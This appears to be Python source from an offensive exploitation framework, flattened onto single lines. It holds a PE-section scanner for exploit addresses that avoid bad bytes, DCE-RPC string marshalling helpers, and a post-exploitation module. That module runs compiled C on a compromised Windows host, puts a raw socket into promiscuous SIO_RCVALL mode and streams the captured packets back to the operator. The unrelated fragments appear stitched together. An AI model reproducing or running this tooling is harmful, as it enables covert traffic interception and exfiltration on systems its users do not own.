def dofile(self, filename): import time, os filename = filename.lower() systemroot = "c:\\WINDOWS" #os.environ.get("%systemroot%","") filename = filename.replace("%systemroot%", systemroot) if self.imports.get(filename, 0): print "Skipping %s - already done" % filename return print "dofile doing %s" % filename found = 0 i = 0 #print "Path= %s"%sys.path #hardcore little open file routine while not found and i < len(sys.path): fullfilename = os.path.join(sys.path[i], filename) i += 1 try: #print "Looking for %s"%fullfilename rawdata = file(fullfilename, "rb").read() found = 1 except: pass if not found: print "COULD NOT FIND FILE %s" % filename return [] #sys.exit(1) myPE = self.openPE(rawdata) sections = myPE.Sections for section in sections.keys(): imagebase = myPE.IMGOPThdr.ImageBase virtualaddress = sections[section].VirtualAddress pointer = sections[section].PointerToRawData size = sections[section].SizeOfRawData print "Section name: %s pointer=%x size=%x" % (section, pointer, size) data = rawdata[pointer:pointer + size] found = data.find(self.searchstring) if found != -1: #now we need to make sure there are no bad bytes addy = imagebase + virtualaddress + found allgood = 1 for c in intel_order(addy): if self.badbytes.count(c): allgood = 0 if allgood: print "Badstring: %s" % self.badbytes print "Address: %x" % addy print "Found searchstring in data at reachable address!" print "We're done, baby" sys.exit(1) time.sleep(500) #print "Sections: %s"%sections self.sections[filename] = sections #print "self.sections=%s"%self.sections imports = myPE.Imports.keys() self.imagebases[filename] = myPE.IMGOPThdr.ImageBase self.imports[filename] = 1 #done! return imports
def s_dce_raw_unistring(mystr): """ mystr is already unicoded for us but we null terminate it """ data = "" if len(mystr) % 2 != 0: logging.debug("Warning, your raw unicode string is not aligned!") size = len(mystr) / 2 + 1 data += intel_order(size) data += intel_order(0) data += intel_order(size) data += mystr + "\x00\x00" padding = 4 - len(data) % 4 if padding != 4: data += "\x00" * (padding) return data
def s_dce_wordstring(mystr, nullterm=0): """ turn mystr into a dce string (not null terminated) """ data = "" #null terminate if necessary if nullterm and mystr[-1] != "\x00": mystr += "\x00" size = len(mystr) data += intel_order(size) data += intel_order(0) data += intel_order(size) data += mystr #data+="\x00" padding = 4 - len(data) % 4 if padding == 4: padding = 0 data += "\x00" * (padding) return data
def run(self): self.setInfo("%s (in progress)" % (NAME)) self.getargs() node = self.argsDict['passednodes'][0] type = node.nodetype.lower() nodename = node.getname() if isinstance(node, localNode): self.fail('Node of type %s not supported.' % type) return 0 if "win32api" not in node.capabilities: return 0 if type not in ['win32node', 'win64node']: self.fail('Node of type %s not supported yet.' % type) return 0 if self.snaplen <= 0: self.fail('Error: snaplen should be > 0, aborting..') return 0 self.dirname = self.output(ip=node.get_interesting_interface(), subdir='pcap_files') hostname = node.shell.gethostname() if not hostname: self.fail('Could not grab hostname, aborting..') return 0 self.log('Remote hostname: %s' % hostname) ret, addrs = node.shell.gethostbyname(hostname, parse=False) if ret == 0: self.fail(addrs) return 0 if not addrs: self.fail('Could not get list of remote IP addresses, aborting..') return 0 self.log('=' * 20 + ' ADDRESSES ' + '=' * 20) for idx, addr in enumerate(addrs): self.log('%d:\t %s' % (idx, socket.inet_ntoa(intel_order(addr)))) if self.addr_idx < 0 or self.addr_idx > len(addrs) - 1: self.fail('Invalid address given, aborting..') return 0 self.log('Initiating packet capture on %s' % socket.inet_ntoa(intel_order(addrs[self.addr_idx]))) vars = { 'AF_INET': socket.AF_INET, 'SOCK_RAW': socket.SOCK_RAW, 'IPPROTO_IP': socket.IPPROTO_IP, 'FD': node.shell.fd, 'ADDR': addrs[self.addr_idx], 'SNAPLEN': self.snaplen, } code = """ #import "REMOTE", "ws2_32.dll|socket" as "socket" #import "REMOTE", "ws2_32.dll|bind" as "bind" #import "REMOTE", "ws2_32.dll|WSAIoctl" as "WSAIoctl" #import "REMOTE", "ws2_32.dll|recv" as "recv" #import "REMOTE", "ws2_32.dll|WSARecv" as "WSARecv" #import "REMOTE", "ws2_32.dll|WSASocketA" as "WSASocketA" #import "REMOTE", "ws2_32.dll|select" as "select" #import "REMOTE", "ws2_32.dll|ioctlsocket" as "ioctlsocket" #import "REMOTE", "ws2_32.dll|getpeername" as "getpeername" #import "local", "memset" as "memset" #import "local", "memcpy" as "memcpy" #import "local", "malloc" as "malloc" #import "local", "free" as "free" #import "local", "sendint" as "sendint" #import "local", "sendstring" as "sendstring" #import "local", "writeblock2self" as "writeblock2self" """ if type == 'win32node': code = code.replace("REMOTE", "remote") code += """ #import "int", "FD" as "FD" """ else: code = code.replace("REMOTE", "local") code += """ #import "local", "sendlonglong" as "sendlonglong" #import "long long", "FD" as "FD" """ code += """ #import "int", "AF_INET" as "AF_INET" #import "int", "SOCK_RAW" as "SOCK_RAW" #import "int", "IPPROTO_IP" as "IPPROTO_IP" #import "int", "ADDR" as "ADDR" #import "int", "SNAPLEN" as "SNAPLEN" struct sockaddr_in { short sin_family; short sin_port; int sin_addr; char sin_zero[8]; }; struct timeval { int tv_sec; int tv_usec; }; struct iphdr { char ver; char tos; short total_length; short id; char frag; char frag_offset; char ttl; char protocol; short checksum; int srcaddr; int destaddr; }; struct wsabuf { int len; char *buf; }; """ if type == 'win32node': code += """ struct fd_set { int count; int fd; }; """ else: code += """ struct fd_set { int count; long long fd; }; """ code += """ void main() { """ if type == 'win32node': code += """ int raw_sock; """ else: code += """ long long raw_sock; """ code += """ int ret; int i; int k; int l; struct fd_set read_set; char *buf; struct sockaddr_in dst; struct timeval tv; struct wsabuf wbuf; struct iphdr *ihdr; // CREATE RAW SOCKET raw_sock = WSASocketA(AF_INET, SOCK_RAW, IPPROTO_IP, 0, 0, 1); """ if type == 'win32node': code += """ sendint(raw_sock); """ else: code += """ sendlonglong(raw_sock); """ code += """ if (raw_sock == -1) { return; } // BIND RAW SOCKET memset(&dst, 0, 16); i = ADDR; memcpy(&dst.sin_addr, &i, 4); dst.sin_family = AF_INET; dst.sin_port = 0; ret = bind(raw_sock, &dst, 16); sendint(ret); if (ret == -1) { return; } // PROMISC SIO_RCVALL i = 1; k = 0; ret = WSAIoctl(raw_sock, 0x98000001, &i, 4, 0, 0, &k, 0, 0); sendint(ret); if (ret == -1) { return; } // MALLOC buf = malloc(SNAPLEN); // GETPEERNAME i = 16; memset(&dst, 0, 16); ret = getpeername(FD, &dst, &i); sendint(ret); if (ret != 0) { free(buf); return; } sendint(dst.sin_addr); sendint(dst.sin_port); // CAPTURE LOOP while (1) { read_set.count = 1; read_set.fd = raw_sock; tv.tv_sec = 1; tv.tv_usec = 0; ret = select(2, &read_set, 0, 0, &tv); if (ret == -1) { sendint(ret); free(buf); return; } if (ret > 0) { k = 0; l = 0; wbuf.len = SNAPLEN; wbuf.buf = buf; ret = WSARecv(raw_sock, &wbuf, 1, &k, &l, 0, 0); if (ret < 0) { sendint(ret); free(buf); return; } ret = k; ihdr = wbuf.buf; if (ihdr->destaddr != dst.sin_addr) { if (ihdr->srcaddr != dst.sin_addr) { sendint(ret); writeblock2self(wbuf.buf, ret); } } } read_set.count = 1; read_set.fd = FD; tv.tv_sec = 0; tv.tv_usec = 1; ret = select(2, &read_set, 0, 0, &tv); if (ret > 0) { i = 0; recv(FD, &i, 4, 0); sendint(i); free(buf); return; } } } """ node.shell.clearfunctioncache() request = node.shell.compile(code, vars) node.shell.sendrequest(request) if type == 'win32node': raw_sock = node.shell.readint(signed=True) else: raw_sock = node.shell.readlonglong(signed=True) if raw_sock == -1: self.fail( 'Could not create raw socket (permission/access), aborting..') node.shell.leave() return 0 self.log('Creating RAW socket: %d' % raw_sock) ret = node.shell.readint(signed=True) if ret == -1: self.fail('Could not bind() raw socket, aborting..') node.shell.leave() return 0 ret = node.shell.readint(signed=True) if ret == -1: self.fail('Could not set SIO_RCVALL, aborting..') node.shell.leave() return 0 ret = node.shell.readint() if ret != 0: self.fail('getpeername: error, aborting..') node.shell.leave() return 0 self.log('getpeername: %s:%d' % (socket.inet_ntoa(intel_order(node.shell.readint())), socket.ntohs(node.shell.readint()))) self.log('Capturing...') if self.wireshark == 1: self.make_pcap_pipe() self.make_pcap_file() try: while True: try: node.shell.connection.set_timeout(1) status = node.shell.readint(signed=True) node.shell.connection.set_timeout(None) if (status == -1 or status == 0): self.fail('Error during packet capture, aborting..') node.shell.leave() return 0 buf = node.shell.readbuf(status) buf = self.rewrite_packet(buf, 1, 1, len(buf)) if self.pipe: self.send_to_pipe(buf) if self.file: self.send_to_file(buf) except Timeout: node.shell.connection.set_timeout(None) if self.getState() == self.HALT: break continue except KeyboardInterrupt: node.shell.connection.set_timeout(None) self.log('Caught CTRL-C, aborting..') self.terminate(node) self.setInfo("%s - done (success)" % (NAME)) return 1